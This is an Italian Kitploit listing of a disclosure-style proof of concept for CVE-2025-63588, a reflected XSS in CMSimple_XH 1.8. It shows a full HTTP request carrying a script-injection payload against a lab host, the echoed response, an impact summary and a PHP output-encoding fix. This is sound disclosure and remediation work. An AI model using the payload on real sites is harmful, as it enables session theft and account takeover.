Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-63588 — Proof-of-concept dettagliato per CVE-2025-63588, una vulnerabilità XSS riflessa in CMSimple_XH 1.8, con punteggio CVSS, analisi dell'impatto ed esempio di remediation di codifica sicura. | Kitploit
Strumenti/GitHubGitHub/cybercrewinc/cve-2025-63588
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebSicurezza WebPenetration TestingApprendimento e Formazione
GitHubcybercrewinc/cve-2025-63588

CVE-2025-63588

Proof-of-concept dettagliato per CVE-2025-63588, una vulnerabilità XSS riflessa in CMSimple_XH 1.8, con punteggio CVSS, analisi dell'impatto ed esempio di remediation di codifica sicura.

Vedi Repository
210 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2025-63588 Cross-Site Scripting (XSS) riflesso nella gestione del percorso cmsimplexh di CMSimple_XH)

CVSS v3.1 stimato: AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:N → 6.1 (Medio) CVE assegnato: CVE-2025-63588
Prodotti: CMSimple_XH - 1.8 Fornitore: CMSimple_XH - https://www.cmsimple-xh.org/

Sommario

Esiste una vulnerabilità di Cross-Site Scripting (XSS) riflesso nel codice di parsing del front-router di CMSimple_XH che gestisce input dinamici relativi al login. L'applicazione riflette i dati controllati dall'attaccante presi dall'URI della richiesta direttamente nell'HTML generato (ad esempio negli attributi action dei form e negli href degli anchor) senza una corretta codifica dell'output. Un attaccante può creare un URL che, se visitato da una vittima, causa l'esecuzione di JavaScript arbitrario nel browser della vittima nel contesto del sito vulnerabile.

Si tratta di un XSS riflesso (non persistente); lo sfruttamento richiede che una vittima segua un link appositamente creato. Il fornitore è stato informato e il problema è stato documentato e gli è stato assegnato il CVE sopra indicato.

Impatto

  • Esecuzione di codice lato client — JavaScript arbitrario può essere eseguito nel contesto del sito.
  • Divulgazione di informazioni — gli script possono leggere il contenuto del DOM e qualsiasi cookie o token accessibile dal client. Se i cookie di sessione non sono impostati come HttpOnly, i token di sessione possono essere rubati.
  • Hijacking di sessione / impersonificazione — l'esfiltrazione dei token potrebbe consentire il takeover dell'account a seconda dei privilegi della vittima.
  • Phishing / spoofing dell'interfaccia / azioni forzate — gli script iniettati possono creare un'interfaccia falsa, reindirizzare l'utente o inviare azioni sotto la sessione della vittima.

Componente affetto

La vulnerabilità deriva dal codice del front-router / index.php (o controller front-end equivalente) che analizza i segmenti di percorso dinamici e li mappa in variabili di pagina/template. I frammenti di percorso grezzi (il frammento di stile ?Templates... utilizzato dal router di CMSimple_XH) vengono passati ai template delle pagine e iniettati negli attributi HTML senza una codifica o sanificazione appropriata degli attributi HTML, consentendo l'iniezione di tag <script> o altri payload che vengono renderizzati così come sono. Problemi simili di XSS riflesso sono stati pubblicati per altri componenti web e sono comunemente causati da una codifica errata dell'output di input non fidati.

Proof-of-Concept (PoC)

Questo PoC dimostra il riflesso dell'input fornito dall'attaccante nell'HTML restituito, che verrà eseguito nel browser della vittima.

Richiesta:

root@kitploit:~
POST /cmsimplexh/?Templatesx6l81"><script>alert(1)</script>y92q9 HTTP/1.1
Host: 192.168.98.129:8080
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36
Connection: close
Cache-Control: max-age=0
Origin: http://192.168.98.129:8080
Upgrade-Insecure-Requests: 1
Referer: http://192.168.98.129:8080/cmsimplexh/?Templates&login
Content-Type: application/x-www-form-urlencoded
Sec-CH-UA: "Chromium";v="138", "Not;A=Brand";v="24", "Google Chrome";v="138"
Sec-CH-UA-Platform: "Windows"
Sec-CH-UA-Mobile: ?0
Content-Length: 45

login=true&keycut=z9U%21q2k%21F0&submit=Login
Immagine incollata 20251006200014

Risposta:

root@kitploit:~
HTTP/1.1 200 OK
Host: 192.168.98.129:8080
Date: Mon, 06 Oct 2025 02:50:49 GMT
Connection: close
X-Powered-By: PHP/8.3.6
Set-Cookie: XH_2f636d73696d706c6578682f=v7hkld81biddtmoua1maptd18a; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Language: en

<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="content-type" content="text/html;charset=UTF-8">
<title>English Site Title – Login</title>
<meta name="robots" content="noindex">
<meta name="keywords" content="Enter list of comma separated keywords here">
<meta name="description" content="Enter website description for search engine results here">
<link rel="stylesheet" href="./assets/css/xhstyles.css" type="text/css">
<link rel="stylesheet" href="./templates/fhs-simple-2019/stylesheet.css" type="text/css">
<meta name="robots" content="noindex">
</head>
<body class="xh_login" onload="document.forms['login'].elements['keycut'].focus();">
<div class="xh_login"><h1>Login</h1><p class="xh_fail">You have entered a wrong password!</p><p><b>Site administration. Please enter password.</b></p><form id="login" name="login" action="/cmsimplexh/?Templatesx6l81"><script>alert(1)</script>y92q9" method="post"><input type="hidden" name="login" value="true"><input type="password" name="keycut" id="passwd" value=""> <input type="submit" name="submit" id="submit" value="Login"></form><p><a href="https://github.com/cybercrewinc/cve-2025-63588/blob/main/cmsimplexh?Templatesx6l81"><script>alert(1)</script>y92q9">Back</a></p> </div></body>
</html>
Immagine incollata 20251006200122

Quando il browser della vittima renderizza questa pagina, lo <script>alert(1)</script> iniettato viene eseguito. Immagine incollata 20251006204432 Immagine incollata 20251006204517

Esempio PHP suggerito per l'output sicuro di un attributo action:

root@kitploit:~
$action_url = '/cmsimplexh/?' . rawurlencode($template_token);
echo '<form action="' . htmlspecialchars($action_url, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8') . '" method="post">';

Crediti

Crediti

CVE assegnato:** CVE-2025-63588

https://nvd.nist.gov/vuln/detail/CVE-2025-63588

Scopritore:株式会社CyberCrew / サイバークル

Riferimenti

https://github.com/cmsimple-xh/cmsimple-xh/releases https://nvd.nist.gov/vuln/detail/CVE-2025-24576


✉️ Contatti

Per domande o richieste, non esitate a contattarci.


🏢 CyberCrew Co., Ltd.

G1@4x

📞 Tel: 03-6853-5823
📧 Mail: [email protected]


📄 Informazioni sull'azienda

VoceContenuto
Nome aziendaCyberCrew Co., Ltd.
Sede6° piano, Akihabara Dai Building, 1-18-13 Sotokanda, Chiyoda-ku, Tokyo

🔐 Servizi principali

🛡️ Valutazione della sicurezza e analisi dei rischi

Analizziamo le vulnerabilità dell'organizzazione da più prospettive e proponiamo le migliori contromisure.

💻 Test di penetrazione

Copriamo test mirati, basati su scenari e LLM pentest.

🌒 Monitoraggio del dark web

Rileviamo tempestivamente la fuga di informazioni sensibili e interveniamo rapidamente.

🎯 Esercitazioni Red Team e ingegneria sociale

Eseguiamo valutazioni della capacità difensiva basate su scenari di attacco realistici.

🧠 Progettazione di sistemi sicuri e consulenza

Supportiamo la progettazione con considerazioni sulla sicurezza fin dalle fasi iniziali dello sviluppo.


🌐 Sito ufficiale: https://www.cybercrew.co.jp
🕒 CyberCrew — Il tuo partner di fiducia per la sicurezza.

Scarica lo strumento